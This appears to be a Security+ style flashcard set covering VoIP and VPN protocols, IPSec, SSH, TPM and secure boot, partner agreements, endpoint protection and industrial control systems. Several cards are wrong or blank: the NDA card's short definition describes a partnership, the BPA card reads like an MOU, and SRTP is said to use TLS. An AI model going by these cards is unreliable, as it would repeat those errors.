Implementing Internet telephony and video conferencing brings its own raft of security concerns. Each part of the communications media network infrastructure needs to be evaluated for threats and vulnerabilities. This includes protocols, servers, handsets, and software. The protocols designed to support real-time services cover one or more of the following functions: 

  • Session control—used to setup and manage communications sessions. They handle tasks such as user discovery (locating a user on the network), availability advertising (whether a user is prepared to receive calls), negotiating session parameters (such as use of audio/video), and session management and termination. 
  • Data transport—handles the delivery of the actual video or voice information.
  • Quality of Service (QoS)—provides information about the connection to a QoS system, which in turn ensures that voice or video communications are free from problems such as dropped packets, delay, or jitter. 
Term
 Session Initiation Protocol (SIP) 
SIP UDP/TCP 5060,
SIPS TCP 5061
Definition

Used to establish, disestablish, and manage VoIP and conferencing communications sessions. It handles user discovery (locating a user on the network), availability advertising (whether a user is prepared to receive calls), negotiating session parameters (such as use of audio/ video), and session management and termination.

 

The Session Initiation Protocol (SIP) is one of the most widely used session control protocols. SIP endpoints are the end-user devices (also known as user-agents), such as IP-enabled handsets or client and server web conference software. Each device, conference, or telephony user is assigned a unique SIP address known as a SIP Uniform Resource Indicator (URI), such as sip:bob.dobbs@comptia.org

 

SIP endpoints can establish communications directly in a peer-to-peer architecture, but it is more typical to use intermediary servers and directory servers. A SIP network may also use gateways and private branch exchange (PBX) appliances to provide an interface between the VoIP network and external telephone and cellular networks.

Term
Real-time Transport Protocol (RTP)

SRTP
Definition

Opens a data stream for video and voice applications over UDP. The data is packetized and tagged with control information (sequence numbering and time-stamping).


SRTP - Version of RTP secured using TLS.

 

 

 

Term
 tunnel
Definition

The practice of encapsulating data from one protocol for safe transfer over another network such as the Internet.

 

Term
REMOTE ACCESS ARCHITECTURE 
 Remote Access VPN[image]
Definition

With a remote access VPN, clients connect to a VPN gateway on the edge of the private network. This is the "telecommuter" model, allowing home-workers and employees working in the field to connect to the corporate network. The VPN protocol establishes a secure tunnel so that the contents are kept private, even when the packets pass over ISPs' routers.

 

 

 

Term
REMOTE ACCESS ARCHITECTURE 
Site-to-site VPN
Site-to-site VPN [image]
Definition

 

A VPN can also be deployed in a site-to-site model to connect two or more private networks. Where remote access VPN connections are typically initiated by the client, a site-to-site VPN is configured to operate automatically. The gateways exchange security information using whichever protocol the VPN is based on. This establishes a trust relationship between the gateways and sets up a secure connection through which to tunnel data. Hosts at each site do not need to be configured with any information about the VPN. The routing infrastructure at each site determines whether to deliver traffic locally or send it over the VPN tunnel.

Term

Point-to-Point Tunneling Protocol (PPTP) 

Developed by Cisco and Microsoft to support VPNs over PPP and TCP/IP. PPTP is highly vulnerable to password cracking attacks and considered obsolete.

 

Definition

 

Several VPN protocols have been used over the years. Legacy protocols such as the Point-to-Point Tunneling Protocol (PPTP) have been deprecated because they do not offer adequate security. Transport Layer Security (TLS) and IPSec are now the preferred options for configuring VPN access.

Term
TLS VPN / SSL VPN
 remote access server listening  port 443
Definition

 

A TLS VPN (still more commonly referred to as an SSL VPN) requires a remote access server listening on port 443 (or any arbitrary port number). The client makes a connection to the server using TLS so that the server is authenticated to the client (and optionally the client's certificate must be authenticated by the server). This creates an encrypted tunnel for the user to submit authentication credentials, which would normally be processed by a RADIUS server. Once the user is authenticated and the connection fully established, the VPN gateway tunnels all communications for the local network over the secure socket.

Term
OpenVPN 
Definition
OpenVPN is an open-source example of a TLS VPN (openvpn.net). OpenVPN can work in TAP (bridged) mode to tunnel layer 2 frames or in TUN (routed) mode to forward IP packets.
Term

Secure Socket Tunneling Protocol (SSTP),
A protocol that uses the HTTP over SSL protocol and encapsulates an IP packet with a PPP header and then with an SSTP header.

 

Definition
Term

 The Point-to-Point Protocol (PPP)

×
 

Dial-up protocol working at layer 2 (Data Link) used to connect devices remotely to networks. 

Definition

Dial-up protocol working at layer 2 (Data Link) used to connect devices remotely to networks. A widely used remote dial-in protocol. It provides encapsulation for IP traffic plus IP address assignment and authentication via the widely supported Challenge Handshake Authentication Protocol (CHAP).

 

Term

Internet Protocol Security (IPSec) 

A set of open, non-proprietary standards that are used to secure data through authentication and encryption as the data travels across the network or the Internet.

 

Definition
Internet Protocol Security (IPSec) operates at the network layer (layer 3) of the OSI model, so it can be implemented without having to configure specific application support. IPSec can provide both confidentiality (by encrypting data packets) and integrity/anti-replay (by signing each packet). The main drawback is that it adds overhead to data communications. IPSec can be used to secure communications on local networks and as a remote access protocol.
Term

 Authentication Header (AH) 
[image]

An IPSec protocol that provides authentication for the origin of transmitted data as well as integrity and protection against replay attacks.

 

Definition

The Authentication Header (AH) protocol performs a cryptographic hash on the whole packet, including the IP header, plus a shared secret key (known only to the communicating hosts), and adds this HMAC in its header as an Integrity Check Value (ICV). The recipient performs the same function on the packet and key and should derive the same value to confirm that the packet has not been modified. The payload is not encrypted so this protocol does not provide confidentiality. Also, the inclusion of IP header fields in the ICV means that the check will fail across NAT gateways, where the IP address is rewritten. Consequently, AH is not often used.

Term

Encapsulation Security Payload (ESP)

IPSec sub-protocol that enables encryption and authentication of the header and payload of a data packet.

[image]
Encapsulation Security Payload (ESP) provides confidentiality and/or authentication and integrity. ESP is one of the two core protocols of IPsec.

 

Definition

Encapsulation Security Payload (ESP) provides confidentiality and/or authentication and integrity. It can be used to encrypt the packet rather than simply calculating an HMAC. ESP attaches three fields to the packet: a header, a trailer (providing padding for the cryptographic function), and an Integrity Check Value. Unlike AH, ESP excludes the IP header when calculating the ICV.

Term

IPSEC TRANSPORT AND TUNNEL MODES

IPSec can be used in two modes:

Definition

§  Transport mode—this mode is used to secure communications between hosts on a private network (an end-to-end implementation). When ESP is applied in transport mode, the IP header for each packet is not encrypted, just the payload data. If AH is used in transport mode, it can provide integrity for the IP header.

§  Tunnel mode—this mode is used for communications between VPN gateways across an unsecure network (creating a VPN). This is also referred to as a router implementation. With ESP, the whole IP packet (header and payload) is encrypted and encapsulated as a datagram with a new IP header. AH has no real use case in tunnel mode, as confidentiality will usually be required.

Term

 Internet Key Exchange (IKE) 
Framework for creating a Security Association (SA) used with IPSec. An SA establishes that two hosts trust one another (authenticate) and agree secure protocols and cipher suites to use to exchange data.

 

Definition

IKE negotiations take place over two phases:

  1. Phase I establishes the identity of the two hosts and performs key agreement using the Diffie-Hellman algorithm to create a secure channel. Two methods of authenticating hosts are commonly used:
    • Digital certificates—the hosts use certificates issued by a mutually trusted certificate authority to identify one another.
    • Pre-shared key (group authentication)—the same passphrase is configured on both hosts.
  2. Phase II uses the secure channel created in Phase I to establish which ciphers and key sizes will be used with AH and/or ESP in the IPSec session.
Term

 Layer 2 Tunneling Protocol (L2TP)
VPN protocol for tunneling PPP sessions across a variety of network protocols such as IP, Frame Relay, or ATM.For remote access VPNs, a combination of IPSec with the Layer 2 Tunneling Protocol (L2TP) VPN protocol is often used.


L2TP protocol = 
UDP port 1701
IPSecUDP = port 500 
NAT traversal = UDP port 4500

Definition

For a secure L2TP/IPSec VPN configuration, specific ports need to be allowed through the firewall. The L2TP protocol typically uses UDP port 1701. For IPSec, UDP port 500 is essential for IKE negotiations, and UDP port 4500 is used for NAT traversal. Familiarity with these port requirements is important for setting up and troubleshooting VPN connections.

Term

Layer 2 Tunneling Protocol/IPSec VPN

Definition

A L2TP/IPSec VPN would typically operate as follows:

1.    The client and VPN gateway set up a secure IPSec channel over the Internet, using either a pre-shared key or certificates for IKE.

2.    The VPN gateway uses L2TP to set up a tunnel to exchange local network data encapsulated as Point-to-Point Protocol (PPP) frames. This double encapsulation of traffic is the main drawback, as it adds overhead.

 

3.    The user authenticates over the PPP session using EAP or CHAP.

Term

IKE v2 (INTERNET KEY EXCHANGE) 

The drawbacks of the original version of IKE were addressed by an updated protocol. IKE v2 has some additional features that have made the protocol popular for use as a standalone remote access VPN solution. The main changes are:

Definition

The drawbacks of the original version of IKE were addressed by an updated protocol. IKE v2 has some additional features that have made the protocol popular for use as a standalone remote access VPN solution. The main changes are:

§  Support for EAP authentication methods, allowing, for example, user authentication against a RADIUS server.

§  Simplified connection set up—IKE v2 specifies a single 4-message setup mode, reducing bandwidth without compromising security.

§  Reliability — IKEv2 supports NAT traversal and the feature of multihoming through MOBIKE (IKEv2 Mobility and Multihoming Protocol). Multihoming allows a client device, like a smartphone equipped with multiple interfaces (for instance, Wi-Fi and cellular), to maintain an active IPSec connection even when switching between these interfaces.

 

Compared to L2TP/IPSec, using IKE v2 is more efficient. This solution is becoming much better supported, with native support in Windows 10, for instance. 

Term

Always-On VPN 

Definition
Traditional remote access VPN solutions require the user to initiate the connection and enter their authentication credentials. An always-on VPN means that the computer establishes the VPN whenever an Internet connection over a trusted network is detected, using the user's cached credentials to authenticate. Microsoft has an Always-On VPN solution for Windows Server and Windows 10 clients  and an OpenVPN client can be configured to autoconnect 
Term

Split tunnel
VPN configuration where only traffic for the private network is routed via the VPN gateway.

[image]

Definition

 

  • Split tunnel—the client accesses the Internet directly using its "native" IP configuration and DNS servers.
Term

Full tunnel
VPN configuration where all traffic is routed via the VPN gateway.

[image]

Definition
  • Internet access is mediated by the corporate network, which will alter the client's IP address and DNS servers and may use a proxy.

Full tunnel offers better security, but the network address translations and DNS operations required may cause problems with some websites, especially cloud services. It also means more data is channeled over the link.

Term

Remote Desktop Protocol (RDP)
Microsoft's protocol for operating remote connections to a Windows machine (Terminal Services) allowing specified users to log onto the Windows computer over the network and work remotely. The protocol sends screen data from the remote host to the client and transfer mouse and keyboard input from the client to the remote host. It uses TCP port 3389.

 

Definition
Microsoft's Remote Desktop Protocol (RDP) can be used to access a physical machine on a one-to-one basis. Alternatively, the site can operate a remote desktop gateway that facilitates access to virtual desktops or individual apps running on the network servers

 There are several popular alternatives to Remote Desktop. Most support remote access to platforms other than Windows (macOS and iOS, Linux, Chrome OS, and Android for instance). Examples include TeamViewer (teamviewer.com/en) and Virtual Network Computing (VNC), which is implemented by several different providers (notably realvnc.com/en).
Term

HTML5 VPN
Using features of HTML5 to implement remote desktop/VPN connections via browser software (clientless).

 

Definition

Traditionally, these remote desktop products require a client app. The canvas element introduced in HTML5 allows a browser to draw and update a desktop with relatively little lag. It can also handle audio. This is referred to as an HTML5 VPN or as a clientless remote desktop gateway (guacamole.apache.org). This solution also uses a protocol called WebSockets, which enables bidirectional messages to be sent between the server and client without requiring the overhead of separate HTTP requests.

Term

out-of-band (OOB).
Accessing the administrative interface of a network appliance using a separate network from the usual data network. This could use a separate VLAN or a different kind of link, such as a dial-up modem.

 

Definition
A serial console or modem port on a router is a physically out-of-band management method. When using a browser-based management interface or a virtual terminal over Ethernet and IP, the link can be made out-of-band by connecting the port used for management access to physically separate network infrastructure. This can be costly to implement, but out-of-band management is more secure and means that access to the device is preserved when there are problems affecting the production network.
Term
 in-band connection 
Definition
. With an in-band connection, better security can be implemented by using a VLAN to isolate management traffic. This makes it harder for potential eavesdroppers to view or modify traffic passing over the management interface. This sort of virtual OOB does still mean that access could be compromised by a system-wide network failure, however.
Term

jump server,
A hardened server that provides access to other hosts.

 

Definition

 

One solution to this complexity is to add a single administration server, or jump server, to the secure zone. The jump server only runs the necessary administrative port and protocol (typically SSH or RDP). Administrators connect to the jump server then use the jump server to connect to the admin interface on the application server. The application server's admin interface has a single entry in its ACL (the jump server) and denies connection attempts from any other hosts. 

Term
jump server
[image]
Definition

 

One solution to this complexity is to add a single administration server, or jump server, to the secure zone. The jump server only runs the necessary administrative port and protocol (typically SSH or RDP). Administrators connect to the jump server then use the jump server to connect to the admin interface on the application server. The application server's admin interface has a single entry in its ACL (the jump server) and denies connection attempts from any other hosts. 

Term

Secure Shell (SSH)

A remote administration and file-copy program that supports VPNs by using port forwarding, and that runs on TCP port 22.

 

Definition

SECURE SHELL

 

Secure Shell (SSH) is the principal means of obtaining secure remote access to a command line terminal. The main uses of SSH are for remote administration and secure file transfer (SFTP). There are numerous commercial and open source SSH products available for all the major network operating system (NOS) platforms. The most widely used is OpenSSH (openssh.com).

 

SSH servers are identified by a public/private key pair (the host key). A mapping of host names to public keys can be kept manually by each SSH client or there are various enterprise software products designed for SSH host key management.


 

[image]

Confirming the SSH server's host key using the PuTTY SSH client (Screenshot used with permission from PuTTY.)

 

The host key must be changed if any compromise of the host is suspected. If an attacker has obtained the private key of a server or appliance, they can masquerade as that server or appliance and perform a man-in-the-middle attack, usually with a view to obtaining other network credentials. 

 

The server's host key is used to set up a secure channel to use for the client to submit authentication credentials.  

Term

SSH Client Authentication

Definition

SSH allows various methods for the client to authenticate to the SSH server. Each of these methods can be enabled or disabled as required on the server, using the /etc/ssh/sshd_config file:

§  Username/password—the client submits credentials that are verified by the SSH server either against a local user database or using a RADIUS/TACACS+ server.

§  Public key authentication—each remote user's public key is added to a list of keys authorized for each local account on the SSH server. 

 

§  Kerberos—the client submits a Ticket Granting Ticket (TGT) to the Ticket Granting Service (TGS) along with the Service Principal Name (SPN) of the SSH server that the client wants to access. The Key Distribution Center (KDC) verifies the TGT of the client to authorize access. The TGS then sends a valid session key to the client that can be forwarded to the SSH server to prove identity and gain access.

Managing valid client public keys is a critical security task. Many recent attacks on web servers have exploited poor key management. If a user's private key is compromised, delete the public key from the appliance then regenerate the key pair on the user's (remediated) client device and copy the public key to the SSH server. Always delete public keys if the user's access permissions have been revoked.

Term

SSH Commands

Definition

SSH commands are used to connect to hosts and set up authentication methods. To connect to an SSH server at 10.1.0.10 using an account named "bobby" and password authentication, run:

ssh bobby@10.1.0.10

The following commands create a new key pair and copy it to an account on the remote server:

ssh-keygen -t rsa

ssh-copy-id bobby@10.1.0.10

At an SSH prompt, you can now use the standard Linux shell commands. Use exit to close the connection.

You can also use the scp command to copy a file from the remote server to the local host:

scp bobby@10.1.0.10:/logs/audit.log audit.log

Reverse the arguments to copy a file from the local host to the remote server. To copy the contents of a directory and any subdirectories (recursively), use the -r option.

Term

 

Transport layer security (TLS) version 1.3 improves upon a vulnerability in TLS1.2. Which statement correctly describes a remedy for this vulnerability? 

Definition
  1. TLS version 1.3 removes the ability to downgrade to weaker encryption ciphers and earlier versions of transport layer security.
Term
DNS Footprinting
Definition

DNS footprinting means obtaining information about a private network by using its DNS server to perform a zone transfer (all of the records in a domain) to a rogue DNS.

 

Term
Simple Mail Transfer Protocol (SMTP)
STARTTLS method 
Definition

Port 25—used for message relay 
Port 587 should be used by mail clients to submit messages for delivery.

Term

 

A system administrator is configuring a new Dynamic Host Configuration Protocol (DHCP) server. Consider the various types of attacks specific to DHCP and determine which steps the system administrator should take to protect the server. (Select all that apply.)

Definition

The system administrator should use scanning and intrusion detection to pick up suspicious activity.

The system administrator should disable unused ports and perform regular physical inspections to ensure that unauthorized devices are not connected via unused jacks.

 

The system administrator should enable DHCP snooping on switch access ports to prevent the use of unauthorized DHCP servers. DHCP snooping acts as a firewall between the server and untrusted hosts and should be enabled versus disabled.

 

Term
TLS 1.3
Definition

TLS 1.3 is the removal of the ability to perform downgrade attacks by preventing the use of unsecure features and algorithms from previous versions.


Only ephemeral key agreement is supported in 1.3 and the signature type is supplied in the certificate, so the cipher suite only lists the bulk encryption key strength and mode of operation (AES_256_GCM), plus the cryptographic hash algorithm (SHA384) used within the new hash key derivation function (
HKDF). HKDF is the mechanism by which the shared secret established by Diffie Hellman key agreement is used to derive symmetric session keys.

Term
what can NOT be enabled or disabled when using the /etc/ssh/sshd_config file? (SSH)
Definition

The server's host key is used to set up a secure channel to use for the client to submit authentication credentials but is not enabled or disabled when using the /etc/ssh/sshd_config file.

The server's host key is used to set up a secure channel to use for the client to submit authentication credentials. 

 

Term

SMTP is the basic protocol used to send mail between hosts on the Internet.

 

Definition
Term

An organization routinely communicates directly to a partner company via a domain name. The domain name now leads to a fraudulent site for all users. Systems administrators for the organization find incorrect host records in DNS. What do the administrators believe to be the root cause?

 

Definition

An attacker masquerades as an authoritative name server.

 

DNS server cache poisoning aims to corrupt the records held by the DNS server itself. A DNS server queries an authoritative server for domain information. An attacker can masquerade as an authoritative name server and respond with fraudulent information.

 

Term

hardware Root of Trust (RoT) 

A cryptographic module embedded within a computer system that can endorse trusted execution and attest to boot settings and metrics.

 

 

Definition
hardware Root of Trust (RoT) or trust anchor is a secure subsystem that is able to provide attestation. Attestation means that a statement made by the system can be trusted by the receiver. For example, when a computer joins a network, it might submit a report to the network access control (NAC) server declaring, "My operating system files have not been replaced with malicious versions." The hardware root of trust is used to scan the boot metrics and OS files to verify their signatures, then it signs the report. The NAC server can trust the signature and therefore the report contents if it can trust that the signing entity's private key is secure. 
Term

trusted platform module (TPM)
A specification for hardware-based storage of digital certificates, keys, hashed passwords, and other user and platform identification information. 

 

Definition

The RoT is usually established by a type of cryptoprocessor called a trusted platform module (TPM). TPM is a specification for hardware-based storage of encryption keys, hashed passwords, and other user and platform identification information. The TPM is implemented either as part of the chipset or as an embedded function of the CPU.

Each TPM is hard-coded with a unique, unchangeable asymmetric private key called the endorsement key. This endorsement key is used to create various other types of subkeys used in key storage, signature, and encryption operations. The TPM also supports the concept of an owner, usually identified by a password (though this is not mandatory). Anyone with administrative control over the setup program can take ownership of the TPM, which destroys and then regenerates its subkeys. A TPM can be managed in Windows via the tpm.msc console or through group policy. On an enterprise network, provisioning keys to the TPM might be centrally managed via the Key Management Interoperability Protocol (KMIP).

 

Term

 unified extensible firmware interface (UEFI)
A type of system firmware providing support for 64-bit CPU operation at boot, full GUI and mouse operation at boot, and better boot security.

 

Definition

Most PCs implement the unified extensible firmware interface (UEFI). UEFI provides code that allows the host to boot to an OS. UEFI can enforce a number of boot integrity checks.

 

Term

Secure boot 
A UEFI feature that prevents unwanted processes from executing during the boot operation.

 

Definition

Secure boot is designed to prevent a computer from being hijacked by a malicious OS. UEFI is configured with digital certificates from valid OS vendors. The system firmware checks the operating system boot loader and kernel using the stored certificate to ensure that it has been digitally signed by the OS vendor. This prevents a boot loader or kernel that has been changed by malware (or an OS installed without authorization) from being used. Secure boot is supported on Windows and many Linux platforms (wiki.ubuntu.com/UEFI/SecureBoot). Secure boot requires UEFI, but does not require a TPM.

Term

measured boot 

A UEFI feature that gathers secure metrics to validate the boot process in an attestation report.

 

Definition

A trusted or measured boot process uses platform configuration registers (PCRs) in the TPM at each stage in the boot process to check whether hashes of key system state data (boot firmware, boot loader, OS kernel, and critical drivers) have changed. This does not usually prevent boot, but it will record the presence of unsigned kernel-level

Term

Boot attestation
Report of boot state integrity data that is signed by a tamper-proof TPM key and reported to a network server.

 

Definition
Boot attestation is the capability to transmit a boot log report signed by the TPM via a trusted process to a remote server, such as a network access control server. The boot log can be analyzed for signs of compromise, such as the presence of unsigned drivers. The host can be prevented from accessing the network if it does not meet the required health policy or if no attestation report is received.
Term

Full disk encryption (FDE) 
Encryption of all data on a disk (including system files, temporary files, and the pagefile) can be accomplished via a supported OS, thirdparty software, or at the controller level by the disk device itself.

 

Definition

Full disk encryption (FDE) means that the entire contents of the drive (or volume), including system files and folders, are encrypted.
Drive encryption allays this security concern by making the contents of the drive accessible only in combination with the correct encryption key. Disk encryption can be applied to both hard disk drives (HDDs) and solid state drives (SSDs).

FDE requires the secure storage of the key used to encrypt the drive contents. Normally, this is stored in a TPM. The TPM chip has a secure storage area that a disk encryption program, such as Windows BitLocker, can write its keys to. It is also possible to use a removable USB drive (if USB is a boot device option). As part of the setup process, you create a recovery password or key. This can be used if the disk is moved to another computer or the TPM is damaged.

Term

self-encrypting drives (SED)
A disk drive where the controller can automatically encrypt data that is written to it.

 

Definition

self-encrypting drives (SED), where the cryptographic operations are performed by the drive controller. The SED uses a symmetric data/media encryption key (DEK/MEK) for bulk encryption and stores the DEK securely by encrypting it with an asymmetric key pair called either the authentication key (AK) or key encryption key (KEK). Use of the AK is authenticated by the user password. This means that the user password can be changed without having to decrypt and re-encrypt the drive. Early types of SEDs used proprietary mechanisms, but many vendors now develop to the Opal Storage Specification

 

developed by the Trusted Computing Group (TCG).

Term

key encryption key (KEK)
In storage encryption, the private key that is used to encrypt the symmetric bulk media encryption key (MEK). This means that a user must authenticate to decrypt the MEK and access the media.

 

Definition
Term
Malicious USB Drive
Definition
exploiting the firmware of external storage devices, such as USB flash drives (and potentially any other type of firmware), presents adversaries with an incredible toolkit. The firmware can be reprogrammed to make the device look like another device class, such as a keyboard. In this case it could then be used to inject a series of keystrokes upon an attachment or work as a keylogger. The device could also be programmed to act like a network device and corrupt name resolution, redirecting the user to malicious websites.

Term
Malicious USB lightning Cable
(O.MG)
Definition
Another example is the O.MG cable which packs enough processing capability into an ordinary-looking USB-Lightning cable to run an access point and keylogger.
Term

THIRD-PARTY RISK MANAGEMENT

Definition

When assessing suppliers for risk, it is helpful to distinguish two types of relationship:

§  Vendorthis means a supplier of commodity goods and services, possibly with some level of customization and direct support.

§  Business partnerthis implies a closer relationship where two companies share quite closely aligned goals and marketing opportunities.


A root of trust is only trustworthy if the vendor has implemented it properly. Hardware and firmware vulnerabilities and exploits demonstrate the necessity of third-party risk management. A supply chain is the end-to-end process of supplying, manufacturing, distributing, and finally releasing goods and services to a customer. For example, for a Trusted Platform Module (TPM) to be trustworthy, the supply chain of chip manufacturers, firmware authors, OEM resellers, and administrative staff responsible for provisioning the computing device to the end user must all be trustworthy. Anyone with the time and resources to modify the computer's firmware could (in theory) create some sort of backdoor access. The same is true for any kind of computer or network hardware, right down to USB cables.

 

Establishing a trusted supply chain for computer equipment essentially means denying malicious actors the time or resources to modify the assets being supplied.

Term

end of life (EOL)
Product life cycle phase where sales are discontinued and support options reduced over time.


 end of service life (EOSL)
Product life cycle phase where support is no longer available from the vendor.OSL products no longer receive security updates and so represent a critical vulnerability if any remain in active use.

 

Definition
Term
Memorandum of understanding (MOU)
Definition
A preliminary or exploratory agreement to express an intent to work together. MOUs are usually intended to be relatively informal and not to act as binding contracts. MOUs almost always have clauses stating that the parties shall respect confidentiality, however.
Term

Business partnership agreement (BPA)

Usually a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve the exchange of money.

 

 

 

Definition
While there are many ways of establishing business partnerships, the most common model in IT is the partner agreements that large IT companies (such as Microsoft and Cisco) set up with resellers and solution providers.
Term

Nondisclosure agreement (NDA)

Agreement by two companies to work together closely, such as the partner agreements that large IT companies set up with resellers and solution providers.

 

 

Definition
Legal basis for protecting information assets. NDAs are used between companies and employees, between companies and contractors, and between two companies. If the employee or contractor breaks this agreement and does share such information, they may face legal consequences. NDAs are useful because they deter employees and contractors from violating the trust that an employer places in them.
Term

Service level agreement (SLA)

Operating procedures and standards for a service contract.

 

 

Definition
A contractual agreement setting out the detailed terms under which a service is provided.
Term

Measurement systems analysis (MSA)

Evaluates the data collection and statistical methods used by a quality management process to ensure they are robust.

 

Definition
quality management processes, such as Six Sigma, make use of quantified analysis methods to determine the effectiveness of a system. This can be applied to cybersecurity procedures, such as vulnerability and threat detection and response. A measurement systems analysis (MSA) is a means of evaluating the data collection and statistical methods used by a quality management process to ensure they are robust. This might be an onboarding requirement when partnering with enterprise companies or government agencies
Term

 hardening
The process of making a host or app configuration secure by reducing its attack surface, through running only necessary services, installing monitoring software to protect against malware and intrusions, and establishing a maintenance schedule to ensure the system is patched to be secure against software exploits.

 

Definition
Term
BASELINE CONFIGURATION
Definition
Baseline deviation reporting means testing the actual configuration of hosts to ensure that their configuration settings match the baseline template. On Windows networks, the Microsoft Baseline Security Analyzer (MBSA) tool was popularly used to validate the security configuration. MBSA and other Microsoft reporting tools have now been replaced by the Security Compliance Toolkit
Term
REGISTRY SETTINGS  
Definition
On a Windows domain network, each domain-joined computer will receive policy settings from one or more group policy objects (GPOs). These policy settings are applied to the registry each time a computer boots. Where hosts are centrally managed and running only authorized apps and services, there should be relatively little reason for security-relevant registry values to change. Rights to modify the registry should only be issued to user and service accounts on a least privilege basis. A host-based intrusion detection system can be configured to alert suspicious registry events.
Term

patches 
A small unit of supplemental code meant to address either a security problem or a functionality flaw in a software package or operating system.

 

Definition
Term

patch management 
Identifying, testing, and deploying OS and application updates. Patches are often classified as critical, security-critical, recommended, and optional.

 

Definition
 These issues can be mitigated by deploying an enterprise patch management suite. Some suites, such as Microsoft’s System Center Configuration Manager (SCCM)/Endpoint Manager. are vendor-specific while others are designed to support third-party applications and multiple OSes.
Term

Antivirus (A-V)/ 

Anti-Malware

 

 

 

Definition

The first generation of antivirus (A-V) software is characterized by signature-based detection and prevention of known viruses. An "A-V" product will now perform generalized malware detection, meaning not just viruses and worms, but also Trojans, spyware, PUPs, cryptojackers, and so on. While A-V software remains important, signature-based detection is widely recognized as being insufficient for the prevention of data breaches.

Term

Host-Based Intrusion Detection/Prevention (HIDS/HIPS)

Definition

Host-based intrusion detection systems (HIDS) provide threat detection via log and file system monitoring. HIDS come in many different forms with different capabilities, some of them preventative (HIPS). File system integrity monitoring uses signatures to detect whether a managed file image—such as an OS system file, driver, or application executable—has changed. Products may also monitor ports and network interfaces, and process data and logs generated by specific applications, such as HTTP or FTP.

Term

Endpoint Protection Platform (EPP)

Definition

Endpoint protection usually depends on an agent running on the local host. If multiple security products install multiple agents (say one for A-V, one for HIDS, another for host-based firewall, and so on), they can impact system performance and cause conflicts, creating numerous technical support incidents and security incident false positives. An endpoint protection platform (EPP) is a single agent performing multiple security tasks, including malware/intrusion detection and prevention, but also other security features, such as a host firewall, web content filtering/secure search and browsing, and file/message encryption. 

Term

endpoint detection and response (EDR)
A software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats.

 

Definition
An endpoint detection and response (EDR) product's aim is not to prevent initial execution, but to provide real-time and historical visibility into the compromise, contain the malware within a single host, and facilitate remediation of the host to its original state.
Term

Next-Generation Firewall Integration 

Definition
An analytics-driven next-gen antivirus product is likely to combine with the perimeter and zonal security offered by next-gen firewalls. For example, detecting a threat on an endpoint could automate a firewall policy to block the covert channel at the perimeter, isolate the endpoint, and mitigate risks of the malware using lateral movement between hosts
Term
Sandboxing
Definition

Sandboxing is a technique that isolates an untrusted host or app in a segregated environment to conduct tests. Sandbox environments intentionally limit interfaces with the host environment. The analysis of files sent to a sandbox can include determining whether the file is malicious, how it might have affected certain systems if run outside of the sandbox, and what dependencies it might have with external files and hosts. Sandboxes offer more than traditional anti-malware solutions because you can apply a variety of different environments to the sandbox instead of just relying on how the malware might exist in your current configuration.

Term

embedded system

A computer system that is designed to perform a specific, dedicated function, such as a microcontroller in a medical drip or components in a control system managing a water treatment plant.

 

Definition

An embedded system is a complete computer system that is designed to perform a specific, dedicated function. These systems can be as contained as a microcontroller in an intravenous drip-rate meter or as large and complex as the network of control devices managing a water treatment plant. Embedded systems can be characterized as static environments. A PC is a dynamic environment. The user can add or remove programs and data files, install new hardware components, and upgrade the operating system. A static environment does not allow or require such frequent changes.

Term

programmable logic controller (PLC)
A type of computer designed for deployment in an industrial or outdoor setting that can automate and monitor mechanical systems.

 

Definition
Term

System on chip (SoC)

A processor that integrates the platform functionality of multiple logical controllers onto a single chip.

 

Definition
System on chip (SoC) is a design where all these processors, controllers, and devices are provided on a single processor die (or chip). This type of packaging saves space and is usually power efficient, and so is very commonly used with embedded systems.
Term

Raspberry Pi
Open-source platform producing programmable circuit boards for education and industrial prototyping.
Arduino 

Open-source platform producing programmable circuit boards for education and industrial prototyping.

 

 

 

Definition
Raspberry Pi (raspberrypi.org) and Arduino (arduino.cc) are examples of SoC boards, initially devised as educational tools, but now widely used for industrial applications, and hacking.
Term

field programmable gate array (FPGA) 

A processor that can be programmed to perform a specific function by a customer rather than at the time of manufacture.

 

Definition
field programmable gate array (FPGA) is a type of controller that solves this problem. The structure of the controller is not fully set at the time of manufacture. The end customer can configure the programming logic of the device to run a specific application.
Term

 real-time operating systems (RTOS)
A type of OS that prioritizes deterministic execution of operations to ensure consistent response for time-critical tasks.

 

Definition

Embedded systems typically cannot tolerate reboots or crashes and must have response times that are predictable to within microsecond tolerances. Consequently, these systems often use differently engineered platforms called real-time operating systems (RTOS). An RTOS should be designed to have as small an attack surface as possible. An RTOS is still susceptible to CVEs and exploits, however

Term

baseband radio
The chip and firmware in a smartphone that acts as a cellular modem.

 

Definition
Term
Narrowband-IoT (NB-IoT)—
Definition
this refers to a low-power version of the Long Term Evolution (LTE) or 4G cellular standard. The signal occupies less bandwidth than regular cellular. This means that data rates are limited (20-100 kbps), but most sensors need to send small packets with low latency, rather than making large data transfers. Narrowband also has greater penetrating power, making it more suitable for use in inaccessible locations, such as tunnels or deep within buildings, where ordinary cellular connectivity would be impossible.
Term

 subscriber identity module (SIM)

A small chip card that identifies the user and phone number of a mobile device, via an International Mobile Subscriber Identity (IMSI). 

 

Definition
Term

Z-Wave

 

Definition
Low-power wireless communications protocol used primarily for home automation. Z-Wave uses radio frequencies in the high 800 to low 900 MHz and a mesh topology. In Z-Wave, devices can be configured to work as repeaters to extend the network but there is a limit of four "hops" between a controller device and an endpoint.
Term
Zigbee
Definition

Low-power wireless communications open source protocol used primarily for home automation. ZigBee uses radio frequencies in the 2.4 GHz band and a mesh topology.
Zigbee uses the 2.4 GHz frequency band. This higher frequency allows more data bandwidth at the expense of range compared to Z-Wave and the greater risk of interference from other 2.4 GHz radio communications. Zigbee supports more overall devices within a single network and there is no hop limit for communication between devices.

 

Term

Industrial control systems (ICSs)
A network managing embedded devices (computer systems that are designed to perform a specific, dedicated function).

 

Definition
Industrial control systems (ICSs) provide mechanisms for workflow and process automation. These systems control machinery used in critical infrastructure, like power suppliers, water suppliers, health services, telecommunications, and national security services. An ICS that manages process automation within a single site is usually referred to as a distributed control system (DCS).
Term
 human-machine interfaces (HMIs)
Definition

Input and output controls on a PLC to allow a user to configure and monitor the system.

 

HMI might be a local control panel or software running on a computing host. PLCs are connected within a control loop, and the whole process automation system can be governed by a control server.

Term
data historian,
Definition

Software that aggregates and catalogs data from multiple sources within an industrial control system.

Another important concept is the data historian, which is a database of all the information generated by the control loop.

Term

supervisory control and data acquisition (SCADA)

A type of industrial control system that manages large-scale, multiple-site devices and equipment spread over geographically large areas.

 

Definition

